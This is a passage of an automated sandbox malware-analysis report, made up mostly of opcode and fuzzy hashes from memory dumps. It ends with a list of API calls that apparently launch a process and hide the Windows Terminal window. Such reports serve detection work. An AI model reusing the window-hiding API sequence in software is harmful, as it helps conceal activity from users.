                                          • Instruction Fuzzy Hash: 27116A10A0F6E41FE75393B648359A47FB09F5751030E41EFC089CB0B3C90C294A8792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40f608547d886f5c838556949eb4df0b6a5dd9f97a1c900e77b7f8087f7aac80
                                          • Instruction ID: 42faef52e9c6241042f7fa88b25d90e76161ccf2eed49d9919ea915f783e3a87
                                          • Opcode Fuzzy Hash: 40f608547d886f5c838556949eb4df0b6a5dd9f97a1c900e77b7f8087f7aac80
                                          • Instruction Fuzzy Hash: 8C110A7170990C8FDBA8EF6CE8955A87BE0EF49711F0500BAE44AC35A1DD30ED828BC0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 62d7cc9fd62875f594a7532092f41e7ca5f2f6b8a2eced6c7b65860922373c7c
                                          • Instruction ID: 3d50abeb63d54b1a94ce69ed6f5cfc4fce69755a48eaf39c51efd29ba2d7871f
                                          • Opcode Fuzzy Hash: 62d7cc9fd62875f594a7532092f41e7ca5f2f6b8a2eced6c7b65860922373c7c
                                          • Instruction Fuzzy Hash: 58110652B2AD8E0BE79CAB2868255BCA792EF9425474442FBD45EC31DFED2898434381
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 30d521049dc965fb5796e2a49cd4594b3d65cb1f0fa0678206115c286b7180d0
                                          • Instruction ID: 387f0d187312e6d4235d6efaa031017c4428bdda9fce4cedada04374c876e2d4
                                          • Opcode Fuzzy Hash: 30d521049dc965fb5796e2a49cd4594b3d65cb1f0fa0678206115c286b7180d0
                                          • Instruction Fuzzy Hash: D811D871719D4A4FDB98EB68C4A499577A2EFAC35071842A8D019C72DADD20EC43C740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d503e40455a040a9088da81cf2355a9bdfddf2a0ea04552640265239bce05cb
                                          • Instruction ID: adafbeb6f2d962a15e7de3cadd3c74d9cc051d0e81325135b60ef55588a4c288
                                          • Opcode Fuzzy Hash: 1d503e40455a040a9088da81cf2355a9bdfddf2a0ea04552640265239bce05cb
                                          • Instruction Fuzzy Hash: B5112932709E4D4FDBE8EB6CA8A496177D2FFA934171505F6D048CB266DD25EC838740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 68daf8481ed89f462d399aef1d79c6fab5252f02943639c1fbaffeec01d5f4aa
                                          • Instruction ID: 6522d86e55f3c6af593df9b7a96f165480afeee68906443bd9d5dbb88b33cadd
                                          • Opcode Fuzzy Hash: 68daf8481ed89f462d399aef1d79c6fab5252f02943639c1fbaffeec01d5f4aa
                                          • Instruction Fuzzy Hash: 1B21D560B1CAA98FDB49F7A85865BFD77E5FF59700F1001EBD008C71C3D928A9618792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 752f6d7000eaa5ae44708d13e58b40e7b0181758c8fbf61daf9156891402ca7a
                                          • Instruction ID: 03c8153ce2bd5dbd39de3d8be08edd8175b2c0411c9c3d38148e0c6c11916da6
                                          • Opcode Fuzzy Hash: 752f6d7000eaa5ae44708d13e58b40e7b0181758c8fbf61daf9156891402ca7a
                                          • Instruction Fuzzy Hash: 0B11703770E4258EE729BB9DF8F00E5B360FF802BD3194777C2D587152D914600B8690
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2673ab1f04921b8ecbd2e6da48fc7fc951c45b4e99b4d5eecd2236c6c2664272
                                          • Instruction ID: c12701af981eaa23c6665e70ca033bf9c4c34fd1170bdef388b0297eb815fb9b
                                          • Opcode Fuzzy Hash: 2673ab1f04921b8ecbd2e6da48fc7fc951c45b4e99b4d5eecd2236c6c2664272
                                          • Instruction Fuzzy Hash: E9113A31B19E094FD399F73C84A596873E2EF8C71134105BAD009C32D6DE28BC828741
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f0d27239a48e953eac5b887e22d2672e9842775a6c2d2b468b56f17c10d3423d
                                          • Instruction ID: 38e20b856c11425664236f3829ac13a8d1b5d7f320e9386f5499eb4de36f2a04
                                          • Opcode Fuzzy Hash: f0d27239a48e953eac5b887e22d2672e9842775a6c2d2b468b56f17c10d3423d
                                          • Instruction Fuzzy Hash: 3CF05C3250E72C5FD714A659EC5B9E737A4FBCA324F00012EF04DC3151E2516412C740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f6ef12aeef058c72f98c597f0860ef648beee5744cb13d1bf9eee8b2d27f2a52
                                          • Instruction ID: a84417d90bec81e4696d068d6e1a8ba0c5bcd510d5efa444a0a95a8b608afaeb
                                          • Opcode Fuzzy Hash: f6ef12aeef058c72f98c597f0860ef648beee5744cb13d1bf9eee8b2d27f2a52
                                          • Instruction Fuzzy Hash: F6F0B4202096C44FD362B37CD898E617FE0EF0B210B0A00E9D089CB573C1949941C311
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 09ac4c339758f5f8612308f8b434ce83d3e0b2656470f12a71adf4c5205b3cc6
                                          • Instruction ID: b1375fb0378d47ab20df73d3bfbf47904a1d17abf858ffa245db965947cd1cc6
                                          • Opcode Fuzzy Hash: 09ac4c339758f5f8612308f8b434ce83d3e0b2656470f12a71adf4c5205b3cc6
                                          • Instruction Fuzzy Hash: 0FF0E932B2D9490BE75CE65CA8116FDB3C2EBC8320F11427AE04EC319ADD35680242C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 492ce16f3ad90f05be6b68bbaa6b48be44e2c3a1fac96ccfc9b645d108c31c42
                                          • Instruction ID: b5c5254e58d631b640f3784a0375452eaf7cae7885b7900b3af0f1ace031f498
                                          • Opcode Fuzzy Hash: 492ce16f3ad90f05be6b68bbaa6b48be44e2c3a1fac96ccfc9b645d108c31c42
                                          • Instruction Fuzzy Hash: 61F0903190D68C8FCB55DF64D8199E97BE0FF59311B0502ABE408C7162DB24A618CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3aca9a4fc87143b927c0a164c0692e0b7ff89f92d741ca760e61c06b7a38418d
                                          • Instruction ID: 4c42d286a187d7bdd1ae020883b031980854dc17bb3447450bf09026a66c65af
                                          • Opcode Fuzzy Hash: 3aca9a4fc87143b927c0a164c0692e0b7ff89f92d741ca760e61c06b7a38418d
                                          • Instruction Fuzzy Hash: 66E02B81A1F7D90BF77243BC18722606FE1DF5A50070D80D7D088C51ABDC4C69498351
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 02c450e3e860491ffcb4e3c2ccbe7ee5cec25dc8199363730b59f6652e84236b
                                          • Instruction ID: a557b8362ab2bb438142197aed2ed97f6b688b76df636fd9e9b64aec2c214e16
                                          • Opcode Fuzzy Hash: 02c450e3e860491ffcb4e3c2ccbe7ee5cec25dc8199363730b59f6652e84236b
                                          • Instruction Fuzzy Hash: C9F02732A1A4158FDB05FB3CD86E8E43B70FF4821874901E7C009CB0A3F90AA697CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8b8b30b42306025892bd8a7155a8bffe5a87102e49a880305b85acfb35ba0aff
                                          • Instruction ID: 8ede2238235a641a8254d3bf9c9e4ff02ebc508c17143f5a26908cfcbd3a0398
                                          • Opcode Fuzzy Hash: 8b8b30b42306025892bd8a7155a8bffe5a87102e49a880305b85acfb35ba0aff
                                          • Instruction Fuzzy Hash: 62E0C07250EA1C0FDB14AA596C15CE2BF98EE89374F00015FF40CC2122E1115552C780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dab2f17aa48965f63cc4a8a0d92379ce09c9163b5e1dc0c910f3e9ebf6b00cad
                                          • Instruction ID: 15248ecce65dc6d28ad3f81dd491785d4963c1966fd6d15e599e74b45d02221e
                                          • Opcode Fuzzy Hash: dab2f17aa48965f63cc4a8a0d92379ce09c9163b5e1dc0c910f3e9ebf6b00cad
                                          • Instruction Fuzzy Hash: CDE09220F1D5090BD758BB6C68272BDA3D3DB8C324F0402FEE15EC32AACD1C58424282
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fd2fc4c56a9a9e471ee1b1f4805a869d90dde4ea550074a35c5668f274c71628
                                          • Instruction ID: cb24a1895d86e50dc83645c4f3cb361c60bd5a50562da37ac2749778e7cf667d
                                          • Opcode Fuzzy Hash: fd2fc4c56a9a9e471ee1b1f4805a869d90dde4ea550074a35c5668f274c71628
                                          • Instruction Fuzzy Hash: 4CF01270914A4D8FDB94EF68C45076533E1FF58318F910569E42DC71A1CB35E995C700
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d40a63eb86c17da1663ad2f9d60b97fdcf6ee3f7170ecd8161b0e55208d80ae9
                                          • Instruction ID: 30a966e84db7cfd0d7a4ea75b2b6e16bc7b94cb91e759b8ac14ec8589c67d839
                                          • Opcode Fuzzy Hash: d40a63eb86c17da1663ad2f9d60b97fdcf6ee3f7170ecd8161b0e55208d80ae9
                                          • Instruction Fuzzy Hash: 2DE0207194EA4C5BCF94AB599C511D53BA0FF4C304F06016AE15CC3191D7355A94C781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 09764730f88ca0710a5f56b8b043771dc088181434ddbae5fea520ff63f8bc6a
                                          • Instruction ID: 7b98cb7ae2748eae44a583b39ee3d704249fdcbc5f8ece6c11fbef22e2e38cfd
                                          • Opcode Fuzzy Hash: 09764730f88ca0710a5f56b8b043771dc088181434ddbae5fea520ff63f8bc6a
                                          • Instruction Fuzzy Hash: B0E0BF71914A0C9F8B48EF58E8498DA7BF4FB69315B01025BF41DD3160DB719A54CBC5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b1f28e0735306b5959125236ec85025f6336ac23595cbf9ec9d9aff5f90f9a2c
                                          • Instruction ID: 037b38b6ecdc9e0ec6c8e41c2afdd8746b9371c0e7a8a4f47c6e9e76503375de
                                          • Opcode Fuzzy Hash: b1f28e0735306b5959125236ec85025f6336ac23595cbf9ec9d9aff5f90f9a2c
                                          • Instruction Fuzzy Hash: 72E0EC20B1982D4FEAA8A7BC60656B863D0EF5D20074600F5E40DD72B6DD496E824BC5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9651c49ffbb672c89afb72d525d015d77e2370a2cfc9c6c74575a134d03b1e39
                                          • Instruction ID: 9843a80c642a52b6795252937143b12aef5d2224b59c379ff52cd65c445e2572
                                          • Opcode Fuzzy Hash: 9651c49ffbb672c89afb72d525d015d77e2370a2cfc9c6c74575a134d03b1e39
                                          • Instruction Fuzzy Hash: B9D01251B2992A57E77867AC28622F42281EB5C654B4580B5A41DC119DEC582D9152D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e96c5f1fd035ab442c14ac27235029393af5a7def126e4ee8c9eeb4405af498b
                                          • Instruction ID: c716cbe9256f4115ace0a14cb078a0631aae0ba0665a909140d74a24050168d0
                                          • Opcode Fuzzy Hash: e96c5f1fd035ab442c14ac27235029393af5a7def126e4ee8c9eeb4405af498b
                                          • Instruction Fuzzy Hash: 67D02B21F0081D0DEB44B3F43C365FCF285DFC8101B910831D11DC30C7CC1915110281
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f70a3e4258ff54568b24287414ad9cf349bcb73e6a25d9bc101839ce3ce44c9f
                                          • Instruction ID: 1628d21ed9fa88dfad160e2ec1974f624ead60516f9dd73951122ee4a2dc0d76
                                          • Opcode Fuzzy Hash: f70a3e4258ff54568b24287414ad9cf349bcb73e6a25d9bc101839ce3ce44c9f
                                          • Instruction Fuzzy Hash: 83E0C202A2F94F4EEA2133BD0C71174A9809F1D680F4B00B4D80CCB0F3FC589A884261
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 941add5e61551e6c44e7397dff348394a1da12bc9f5db8b1286dd5523c152982
                                          • Instruction ID: 8695601abc4ecd7136d1eae1059ccfdcf127e5edb158b80db08973b47061f3b6
                                          • Opcode Fuzzy Hash: 941add5e61551e6c44e7397dff348394a1da12bc9f5db8b1286dd5523c152982
                                          • Instruction Fuzzy Hash: A9C0121271D92C09E174625C78162F5B3C1C795231F1002BBD48AC1656DC5B598702C5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d5d97f5a3fddd7cf89062600496adaf892c2bf9b695d5b6afa0f3c3b9a6364f7
                                          • Instruction ID: b6e6a11d8a42ae76fd1e0adb3aaf1768aff2dc7ef0d94bd233f4af6de2d12d5f
                                          • Opcode Fuzzy Hash: d5d97f5a3fddd7cf89062600496adaf892c2bf9b695d5b6afa0f3c3b9a6364f7
                                          • Instruction Fuzzy Hash: 18C04C73B4E12948F7286198B8230FDF350EB8A175B51113BD34A818526917353749C6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c5e06549e8dc0933093c7787333472fa08df5c0d07dc7d1c611b4a59737688a
                                          • Instruction ID: 276be217aed0b6ec11d51fe96ba772bdd3456e4f17fa262a007e095375f8940a
                                          • Opcode Fuzzy Hash: 3c5e06549e8dc0933093c7787333472fa08df5c0d07dc7d1c611b4a59737688a
                                          • Instruction Fuzzy Hash: 6AC0123255DA4D47C301A794E8618EAF390FF90310F510A3AE04A920A9EDD8A64486C2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a403bf08bf6f31eb1c96011066581c925a786bf58cb9b9b7e64f5ee52dd5b0a
                                          • Instruction ID: 53c315e6f998edb12c00d0669bee29fdca43cb7f1199fa8bc42e830192c745c5
                                          • Opcode Fuzzy Hash: 3a403bf08bf6f31eb1c96011066581c925a786bf58cb9b9b7e64f5ee52dd5b0a
                                          • Instruction Fuzzy Hash: 7EC012715146444FE714AA44C44A4E933D1FB98245FC40A6AEC88CA261DA28964646A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 174ccbe69c25f228ee205da7db928a5abeb888826226028c28102d0395c250fe
                                          • Instruction ID: 18e66654e16a49efeba5ac8f86cda2f4c9715ab4ba20998bbd295b82aaceb101
                                          • Opcode Fuzzy Hash: 174ccbe69c25f228ee205da7db928a5abeb888826226028c28102d0395c250fe
                                          • Instruction Fuzzy Hash: ECB01233B4E03C49AF3052C8BC428FCF350E789175B122133C20EA10006517A13207C0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b0c7d2d19b92b04b4b7fd64bcfb5a202519d5645673a44fec078a6ae60055a11
                                          • Instruction ID: 670bdcd8725b969e3ffc543a3b6bb98ce78fd9e21ca2860fef04944e10dedd26
                                          • Opcode Fuzzy Hash: b0c7d2d19b92b04b4b7fd64bcfb5a202519d5645673a44fec078a6ae60055a11
                                          • Instruction Fuzzy Hash: 89A01206F4901100B24434587C410E4E3018BC0075A544932D4144008DD89E11821141
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e6ec1eebebe6caaada64bafab98ba878d12c4b88b7e6642d0097e2506851b3b1
                                          • Instruction ID: 54973b48f549b222dd40ee8fa8bb78e95c6eedcb191323410dabf62405a7690c
                                          • Opcode Fuzzy Hash: e6ec1eebebe6caaada64bafab98ba878d12c4b88b7e6642d0097e2506851b3b1
                                          • Instruction Fuzzy Hash: BDB01235F4644D56DF2067F428264FD3288EF4C204F860572F80DC3193DD29B7340A50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1efa8010a0fc830859ee395f70069e0076dd23dbedb15054713cefcec95c2340
                                          • Instruction ID: 546f11e48ef859a97d13f0512e2c02f14c67ecdd2d7a5e03a134fdcac651f362
                                          • Opcode Fuzzy Hash: 1efa8010a0fc830859ee395f70069e0076dd23dbedb15054713cefcec95c2340
                                          • Instruction Fuzzy Hash: 6CA01233B4101D848B2081C4B8100FDB314E788121B110033E21DC1000551515280590
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ?M_^$M_^N$M_^P$M_^f$M_^t$M_^v
                                          • API String ID: 0-3152059592
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:0.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:12.9%
                                          Total number of Nodes:124
                                          Total number of Limit Nodes:9

                                          Control-flow Graph

                                          APIs
                                          • ShellExecuteExW.SHELL32 ref: 6D144ADB
                                          • WaitForSingleObject.KERNEL32(6D18C8CD,000000FF), ref: 6D144AEA
                                          • CloseHandle.KERNEL32(6D18C8CD), ref: 6D144AF3
                                          • GetClassNameW.USER32(?,?,00000064), ref: 6D144B91
                                          • lstrcmpW.KERNELBASE(?,CASCADIA_HOSTING_WINDOW_CLASS), ref: 6D144BA3
                                          • ShowWindow.USER32(?,00000000), ref: 6D144BAF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
